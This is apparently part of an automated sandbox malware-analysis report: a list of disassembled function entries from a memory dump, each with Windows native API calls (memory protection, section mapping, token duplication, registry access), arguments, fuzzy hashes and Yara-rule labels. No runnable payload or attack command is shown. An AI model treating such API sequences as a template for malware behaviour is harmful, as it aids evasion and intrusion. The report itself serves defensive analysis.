memset.210A(00000000,00000000,00000007,?,?,00000000), ref: 72677231
RtlRandomEx.210A(727384B8,000000FF,00000024,727384B8,00000004,00000000,?,?,00000000), ref: 7267738D
RtlRandomEx.210A(727384B8,000000FF,00000024,727384B8,00000004,00000000,727384B8,000000FF,00000024,727384B8,00000004,00000000,?,?,00000000), ref: 726773A9

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Random$memset
String ID:
API String ID: 3382455506-0
Opcode ID: 0a551dfd9833a5d2e4c678ac28318652f25ba2b143e8d9aab25b2c4ac3642864
Instruction ID: 9f159f722cf406d762f90cc525fd285c2bb3636c398190b19c9ab56489b1bafe
Opcode Fuzzy Hash: 0a551dfd9833a5d2e4c678ac28318652f25ba2b143e8d9aab25b2c4ac3642864
Instruction Fuzzy Hash: B5E18075A00145CFCB0ACF5DD880BA9BBB2FF48310F24816AE956EB395D734E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72658123, Relevance: 7.7, APIs: 5, Instructions: 187nativelibraryCOMMON

Download Yara Rule

APIs

ZwProtectVirtualMemory.210A(000000FF,00000000,00000000,00000002,?,0000000D,00000000,00000000,00000001,00000003,?), ref: 72658212
LdrControlFlowGuardEnforced.210A(0000000D,00000000,00000000,00000001,00000003,?), ref: 72658217
LdrControlFlowGuardEnforced.210A(0000000D,00000000,00000000,00000001,00000003,?), ref: 72658245
ZwProtectVirtualMemory.210A(000000FF,00000000,00000000,00000004,?,0000000D,00000000,00000000,00000001,00000003,?), ref: 726582BC
ZwProtectVirtualMemory.210A(000000FF,00000000,00000000,?,?,000000FF,00000000,00000000,00000004,?,0000000D,00000000,00000000,00000001,00000003,?), ref: 726582EA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryProtectVirtual$ControlEnforcedFlowGuard
String ID:
API String ID: 1784530056-0
Opcode ID: 12d5f15b9821773cdec678b01574adb13bc06d69a424356a55afbc40714e4c4e
Instruction ID: 9595716422b183e6a9f99b9f5f7c7a6af92a255eb3b4971991bd36debcf1fd43
Opcode Fuzzy Hash: 12d5f15b9821773cdec678b01574adb13bc06d69a424356a55afbc40714e4c4e
Instruction Fuzzy Hash: 4E61D0359006069BDB158F9EC9807AEBBB4BF40B64F10015BD992A7AC4E770DDC1CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 72649630, Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

RtlPrefixUnicodeString.210A(72621050,?,00000001), ref: 72649676
RtlPrefixUnicodeString.210A(7262114C,?,00000001,72621050,?,00000001), ref: 7264968F
memmove.210A(00060004,?,?,72621050,?,00000001), ref: 72649720
memcpy.210A(72621908,7262C85C,00000000,00060004,?,?,72621050,?,00000001), ref: 72649732
RtlpEnsureBufferSize.210A(00000000,?,?,72621050,?,00000001), ref: 726A4872

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: PrefixStringUnicode$BufferEnsureRtlpSizememcpymemmove
String ID:
API String ID: 2343691225-0
Opcode ID: bf23022553e95c40c12c045a85777776aa2735286e49435115278bbcdfa6e945
Instruction ID: 2d40d2e4b09f7054b810d430d9eb57574caa40db6d7ec6aaf5b2a408801eba02
Opcode Fuzzy Hash: bf23022553e95c40c12c045a85777776aa2735286e49435115278bbcdfa6e945
Instruction Fuzzy Hash: 8151CE74600195DFDB09CF6DC990BAAB7B5EF41704B2080ABE896DB2C5EB34DE51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 726722C3, Relevance: 7.7, APIs: 5, Instructions: 153memorynativeCOMMON

Download Yara Rule

APIs

RtlRunOnceExecuteOnce.210A(727386D0,72673A10,00000000,00000000,00000000,?,00000001), ref: 726722E5

Part of subcall function 726726AD: RtlGetNtProductType.210A(00000001,00000000,727386D0,?,726722F3,727386D0,72673A10,00000000,00000000,00000000,?,00000001), ref: 726726C3

ZwAllocateVirtualMemory.210A(000000FF,727386D0,00000000,727386D0,00002000,00000000,00000000,727386D0,72673A10,00000000,00000000,00000000,?,00000001), ref: 72672331
ZwAllocateVirtualMemory.210A(000000FF,727386D0,00000000,00000000,00001000,00000000,000000FF,727386D0,00000000,727386D0,00002000,00000000,00000000,727386D0,72673A10,00000000), ref: 72672378
RtlGetCurrentServiceSessionId.210A(000000FF,727386D0,00000000,00000000,00001000,00000000,000000FF,727386D0,00000000,727386D0,00002000,00000000,00000000,727386D0,72673A10,00000000), ref: 72672385

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateMemoryOnceVirtual$CurrentExecuteProductServiceSessionType
String ID:
API String ID: 2463712026-0
Opcode ID: 900d85a15567fa3758c69f8351235e45ddfda1f09b5b378169ccb84b16b4da93
Instruction ID: 482732e82ce98ca81fa6a59b99fe21a8c79e2b98910dd5d624ec43d3ab3f234c
Opcode Fuzzy Hash: 900d85a15567fa3758c69f8351235e45ddfda1f09b5b378169ccb84b16b4da93
Instruction Fuzzy Hash: FC514B71608341AFD301CF1DD944A6ABBEAFF88324F14492AF999DB381D734D905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 7266E79A, Relevance: 7.6, APIs: 5, Instructions: 149COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?), ref: 7266E8BC
RtlAcquireSRWLockExclusive.210A(00000000,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?), ref: 7266E8DE
RtlReleaseSRWLockExclusive.210A(00000000,00000000,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?), ref: 7266E8F7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseServiceSession
String ID:
API String ID: 3179239776-0
Opcode ID: 9dd680ee11a78d63a6d9efcd108ba93ebd5c9e868893e743fc928fa388e5286f
Instruction ID: 1c4dc698ff1d3736f79ee8ab2073a0652318a7e12774fde27a8adb69edb1b233
Opcode Fuzzy Hash: 9dd680ee11a78d63a6d9efcd108ba93ebd5c9e868893e743fc928fa388e5286f
Instruction Fuzzy Hash: 12515875E01685DBCB05CFACC590BAEBBF2BF48310F20856AD955A7384DB36A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 726490D0, Relevance: 7.6, APIs: 5, Instructions: 141nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,7271F0D8,0000002C,7269F069,00000000,?,7271F998,00000010,72717AFC,00000000,00000000,00000000,00000000,727386C4,727386C4,00000008), ref: 72649128
ZwShutdownWorkerFactory.210A(?,?), ref: 72649152
RtlGetCurrentServiceSessionId.210A ref: 72649190

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AcquireCurrentExclusiveFactoryLockServiceSessionShutdownWorker
String ID:
API String ID: 1345183298-0
Opcode ID: 8f7885275742d8854895e57bd6b7faab9432c25a4ff044cb31ca33bace6e395b
Instruction ID: ea9cb8c4e2da9790561689e7d4ae34b0e933dfd74459edb5a1bf74928848374f
Opcode Fuzzy Hash: 8f7885275742d8854895e57bd6b7faab9432c25a4ff044cb31ca33bace6e395b
Instruction Fuzzy Hash: F351E271A42281DFD706CB6CCA88B9DBBB5BF85318F24515BC496A72C1EB309B41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 7267128B, Relevance: 7.6, APIs: 5, Instructions: 112timelibraryCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,?,00000000,?,00000000,00000000,?,726718EA,00000000,?,00000001,?,?,?,?), ref: 726712C4
RtlDebugPrintTimes.210A(00000000,?,?,00000102,?,?,00000000,?,00000000,?,00000000,00000000,?,726718EA,00000000,?), ref: 7267130C
RtlGetCurrentServiceSessionId.210A(?,726718EA,00000000,?,00000001,?,?,?,?,?,?,7266CF93,?,?,?,?), ref: 72671314
LdrAddRefDll.210A(00000000,?,?,00000000,?,00000000,00000000,?,726718EA,00000000,?,00000001,?,?,?,?), ref: 726B3D20
RtlDebugPrintTimes.210A(?,00000000,?,?,00000000,?,00000000,00000000,?,726718EA,00000000,?,00000001,?,?,?), ref: 726B3D4B

Part of subcall function 7266EE70: RtlSetThreadWorkOnBehalfTicket.210A(?,?,?), ref: 7266EEBC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentDebugPrintServiceSessionTimes$BehalfThreadTicketWork
String ID:
API String ID: 3939526806-0
Opcode ID: 0685498e451e9d9aae403506f83332124b9407b37df37ee2bd99cc33aeb1f72c
Instruction ID: c3e8ab77543c7a15a37fdbe235477fd071fdfa7fa02241a3fc7b5212bb2a29d0
Opcode Fuzzy Hash: 0685498e451e9d9aae403506f83332124b9407b37df37ee2bd99cc33aeb1f72c
Instruction Fuzzy Hash: D941AE31601A06EBCB068F68DA80B99BBB6FF44714F50516BE90183FD0DB70A932CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 7266C790, Relevance: 7.6, APIs: 5, Instructions: 108timelibraryCOMMON

Download Yara Rule

APIs

LdrAddRefDll.210A(00000000,?), ref: 726B1EB4

Part of subcall function 7266EE70: RtlSetThreadWorkOnBehalfTicket.210A(?,?,?), ref: 7266EEBC

RtlGetCurrentServiceSessionId.210A(00000000), ref: 7266C7DC
RtlDebugPrintTimes.210A(?,?,?,?), ref: 7266C831
RtlGetCurrentServiceSessionId.210A ref: 7266C839
RtlDebugPrintTimes.210A(?,?,?), ref: 726B1F08

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentDebugPrintServiceSessionTimes$BehalfThreadTicketWork
String ID:
API String ID: 3939526806-0
Opcode ID: 83b2d4cd22776da36344f2d5f364260da4268e00860d349227c5d4de6af79cd5
Instruction ID: bb7e4fd29ce24eff046eaf423dbf23c6ce53125a4b0606ecac9af3fdceca52e2
Opcode Fuzzy Hash: 83b2d4cd22776da36344f2d5f364260da4268e00860d349227c5d4de6af79cd5
Instruction Fuzzy Hash: 76416035600A4AFFC71A8F69D944BAABF76FF84300F10505AE90297691DB35F921CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 726D1408, Relevance: 7.6, APIs: 5, Instructions: 107nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwCreateSection.210A(?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 726D1494
ZwMapViewOfSection.210A(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004,08000000), ref: 726D14B4
memset.210A(?,00000000,000000F0,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?), ref: 726D14C8
ZwUnmapViewOfSection.210A(000000FF,?,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 726D14F8
ZwClose.210A(?,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 726D1508

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Section$View$CloseCreateUnmapmemset
String ID:
API String ID: 788617167-0
Opcode ID: 91ab3f5b2bdbd5e347499a70124e12ae748b478796e586d51d987611038f9859
Instruction ID: ce84a598e8b9e12f1a99f2509df8fd86ffca7042fbe8ad4a382e80535c857beb
Opcode Fuzzy Hash: 91ab3f5b2bdbd5e347499a70124e12ae748b478796e586d51d987611038f9859
Instruction Fuzzy Hash: 14310EB1E00219ABDF10CF9EC840F9EFBB9AF94714F1041AAE911B7290D7B45A41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 72659001, Relevance: 7.6, APIs: 5, Instructions: 100nativeCOMMON

Download Yara Rule

APIs

RtlWow64EnableFsRedirectionEx.210A(00000000,727384D8,727384D8,?,00000000,?,?,727384D8,?,?,00000000,00000000), ref: 72659014
RtlAcquireSRWLockExclusive.210A(727384D8,000014A5,00000024,?,?,00000000,727384D8,727384D8,?,00000000,?,?,727384D8,?), ref: 726590A2
RtlReleaseSRWLockExclusive.210A(727384D8,00100000,00000000,?,727384D8,000014A5,00000024,?,?,00000000,727384D8,727384D8,?,00000000,?,?), ref: 726590C8
ZwClose.210A(?,727384D8,00100000,00000000,?,727384D8,000014A5,00000024,?,?,00000000,727384D8,727384D8,?,00000000,?), ref: 726590F1
RtlWow64EnableFsRedirectionEx.210A(727384D8,727384D8,?,00000000,727384D8,727384D8,?,00000000,?,?,727384D8,?,?,00000000,00000000), ref: 72659106

Part of subcall function 7267F177: RtlAcquireSRWLockExclusive.210A(727384D8,00000000,00000000), ref: 7267F18E
Part of subcall function 7267F177: RtlReleaseSRWLockExclusive.210A(727384D8,727384D8,00000000,00000000), ref: 7267F21D

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireEnableRedirectionReleaseWow64$Close
String ID:
API String ID: 4074408098-0
Opcode ID: 5119c2ed38c6d02f0a80972d52f959634c6eb3fd5751e03b61b7130e984c3e08
Instruction ID: 7de6a895da7795dbcb691282f84a2d14548480a3a602a531fde270645a203bc9
Opcode Fuzzy Hash: 5119c2ed38c6d02f0a80972d52f959634c6eb3fd5751e03b61b7130e984c3e08
Instruction Fuzzy Hash: 3131A375E00249AFDF05CFA9C880BBEBBB6FF84314F10459AD405AB295DB749E06CB94

Uniqueness

Uniqueness Score: -1.00%

Function 7267214F, Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(?,7271F9D8,00000018,726EE2A0), ref: 726721AB

Part of subcall function 726720D7: RtlAllocateHeap.210A(?,0080000A,00000000,?,?,00000001,726721F6,?,7271F9D8,00000018,726EE2A0), ref: 726720F6
Part of subcall function 726720D7: memcpy.210A(00000000,?,?,?,0080000A,00000000,?,?,00000001,726721F6,?,7271F9D8,00000018,726EE2A0), ref: 7267211B
Part of subcall function 726720D7: RtlFreeHeap.210A(?,00000002,?), ref: 7267212C

Part of subcall function 72673AA5: RtlAllocateHeap.210A(?,0080000A,-00000024,00000000,?,00000001,?,?,?,72672211,?,?,7271F9D8,00000018,726EE2A0), ref: 72673AE7

RtlLeaveCriticalSection.210A(?,?,?,7271F9D8,00000018,726EE2A0), ref: 72672225

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

Part of subcall function 726722C3: RtlRunOnceExecuteOnce.210A(727386D0,72673A10,00000000,00000000,00000000,?,00000001), ref: 726722E5
Part of subcall function 726722C3: ZwAllocateVirtualMemory.210A(000000FF,727386D0,00000000,727386D0,00002000,00000000,00000000,727386D0,72673A10,00000000,00000000,00000000,?,00000001), ref: 72672331
Part of subcall function 726722C3: ZwAllocateVirtualMemory.210A(000000FF,727386D0,00000000,00000000,00001000,00000000,000000FF,727386D0,00000000,727386D0,00002000,00000000,00000000,727386D0,72673A10,00000000), ref: 72672378
Part of subcall function 726722C3: RtlGetCurrentServiceSessionId.210A(000000FF,727386D0,00000000,00000000,00001000,00000000,000000FF,727386D0,00000000,727386D0,00002000,00000000,00000000,727386D0,72673A10,00000000), ref: 72672385

RtlEnterCriticalSection.210A(?,?,?,?,7271F9D8,00000018,726EE2A0), ref: 7267223E
RtlGetSuiteMask.210A(?,?,?,?,7271F9D8,00000018,726EE2A0), ref: 72672260
RtlLeaveCriticalSection.210A(?,?,?,?,?,7271F9D8,00000018,726EE2A0), ref: 72672291

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$Allocate$Heap$EnterLeaveMemoryOnceVirtual$CurrentExecuteFreeMaskOwnerRtlpServiceSessionSuitememcpy
String ID:
API String ID: 50890710-0
Opcode ID: 5e6c65032d3085abd4258f8229fdb36617892b94990c7a3c711a14eaa43606de
Instruction ID: 99559c1b93e55b7a0b706ea7be52e9176adc89163f6fbb9b6652449f3a785f5b
Opcode Fuzzy Hash: 5e6c65032d3085abd4258f8229fdb36617892b94990c7a3c711a14eaa43606de
Instruction Fuzzy Hash: EC41A271A057858BDB12CBBCC45079EBBF2AF55304F24052FC196A73C1CB349555CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 7264B1C3, Relevance: 7.6, APIs: 5, Instructions: 85librarymemoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,?,?,?,?,?,?,7264B1BF), ref: 7264B1E4
RtlReleaseSRWLockExclusive.210A(?,?,?,?,?,?,?,?,7264B1BF), ref: 726A57DC

Part of subcall function 7268681F: LdrControlFlowGuardEnforced.210A(?,?,?,7264846D,72624704,?,?,?,?,?,72648432,00000000), ref: 72686826

Part of subcall function 7267BD8C: RtlAcquireSRWLockExclusive.210A(727379E4,72738654,00000000,?,7267FD92,00000000,?,7267FD59,72738654,?,?,?,7267FD2F,?,7265DCEB,727384D8), ref: 7267BD99
Part of subcall function 7267BD8C: RtlReleaseSRWLockExclusive.210A(727379E4,727379E4,72738654,00000000,?,7267FD92,00000000,?,7267FD59,72738654,?,?,?,7267FD2F,?,7265DCEB), ref: 7267BDC3

RtlReleaseSRWLockExclusive.210A(?,00000000,?,?,?,?,?,?,?,7264B1BF), ref: 7264B248
LdrControlFlowGuardEnforced.210A(?,00000000,?,?,?,?,?,?,?,7264B1BF), ref: 7264B251
RtlFreeHeap.210A(00000000,?,?,?,?,?,?,?,7264B1BF), ref: 7264B266

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Release$AcquireControlEnforcedFlowGuard$FreeHeap
String ID:
API String ID: 966926910-0
Opcode ID: ce90f55cfb0e872bd67f629aa5fc60f2cfa662c11806479ad29f2ba581b540f6
Instruction ID: a6d15460a74e99483287ff32af6436f61216ac1aaa513dc0243a4c81c8a77b58
Opcode Fuzzy Hash: ce90f55cfb0e872bd67f629aa5fc60f2cfa662c11806479ad29f2ba581b540f6
Instruction Fuzzy Hash: FD213831A00254EFCB2A9FADC9C1B2EBBBAEF05340F00547FE556972C1DA319D01CA94

Uniqueness

Uniqueness Score: -1.00%

Function 7264A740, Relevance: 7.6, APIs: 5, Instructions: 81nativethreadCOMMON

Download Yara Rule

APIs

ZwOpenProcessTokenEx.210A(000000FF,00000002,00000200,?,?,00000000,00800000), ref: 7264A7A3
ZwDuplicateToken.210A(?,?,00000018,00000000,00000002,?,000000FF,00000002,00000200,?,?,00000000,00800000), ref: 7264A7C1
ZwSetInformationThread.210A(000000FE,00000005,?,00000004,?,?,00000018,00000000,00000002,?,000000FF,00000002,00000200,?,?,00000000), ref: 7264A7D6
ZwClose.210A(?,000000FE,00000005,?,00000004,?,?,00000018,00000000,00000002,?,000000FF,00000002,00000200,?), ref: 7264A7E8
ZwClose.210A(?,?,?,00000018,00000000,00000002,?,000000FF,00000002,00000200,?,?,00000000,00800000), ref: 7264A7F0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseToken$DuplicateInformationOpenProcessThread
String ID:
API String ID: 3308950446-0
Opcode ID: 40b2bbf75b1b2c8686b76dba785772911be0864703d6be3b537c9703dbae2120
Instruction ID: 87cefb73e8e5567a740c03cc0c4f5e6663d26851dc8fdc2e2907126a45e9c71d
Opcode Fuzzy Hash: 40b2bbf75b1b2c8686b76dba785772911be0864703d6be3b537c9703dbae2120
Instruction Fuzzy Hash: 03214F75D00219ABDB11CF98C891BEEBBB5AF44320F11412AE911B7290DB34DD018B94

Uniqueness

Uniqueness Score: -1.00%

Function 726C7194, Relevance: 7.6, APIs: 5, Instructions: 70memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,?,0000002E,7FFE0384,7FFE0385,00000000,?,?,?,726AA4DE,?,?,?,00000000,00000000), ref: 726C71BF
memcpy.210A(0000002C,?,00000000,?,?,0000002E,7FFE0384,7FFE0385,00000000,?,?,?,726AA4DE,?,?,?), ref: 726C7200
RtlGetCurrentServiceSessionId.210A ref: 726C7211
ZwTraceEvent.210A(0000000E,00000403,0000000E,00000000), ref: 726C723E
RtlFreeHeap.210A(?,00000000,00000000,0000000E,00000403,0000000E,00000000), ref: 726C724F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$AllocateCurrentEventFreeServiceSessionTracememcpy
String ID:
API String ID: 4157723259-0
Opcode ID: a49fa2307db85c4dcecbd3885288d500f1fd18c41798670f11441ccfb9f5438e
Instruction ID: d2b67e0def641f1b625daed28f4ee19c708438a8528077c7556ee3746cd15a62
Opcode Fuzzy Hash: a49fa2307db85c4dcecbd3885288d500f1fd18c41798670f11441ccfb9f5438e
Instruction Fuzzy Hash: 94218E72500644ABC726DFA9D890EAABBBDEB49740F10456AF50AC7790D634E900CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 7264E460, Relevance: 7.6, APIs: 5, Instructions: 59nativeCOMMON

Download Yara Rule

APIs

RtlFormatCurrentUserKeyPath.210A(726F5BB5,00020019,00000000,00000000,?,?,00020019,?,726F5B14), ref: 7264E46F

Part of subcall function 726593D0: ZwQueryInformationToken.210A(000000FA,00000001,?,00000050,?,00000000), ref: 726593F4
Part of subcall function 726593D0: RtlLengthSidAsUnicodeString.210A(?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72659404
Part of subcall function 726593D0: RtlAppendUnicodeToString.210A(00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72659433
Part of subcall function 726593D0: RtlConvertSidToUnicodeString.210A(?,?,00000000,00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72659459

RtlFreeUnicodeString.210A(726F5BB5,?,726F5BB5,?,726F5BB5,00020019,00000000,00000000,?,?,00020019), ref: 7264E4AD

Part of subcall function 72662050: RtlDeleteBoundaryDescriptor.210A(00000000,00000000,?,7265948C,00000000,?,?,00000000,00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA,00000001), ref: 72662062

ZwOpenKey.210A(?,726F5BB5,?,726F5BB5,00020019,00000000,00000000,?,?,00020019), ref: 7264E4A2

Part of subcall function 7268A300: LdrInitializeThunk.NTDLL(7264E062,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 7268A30A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

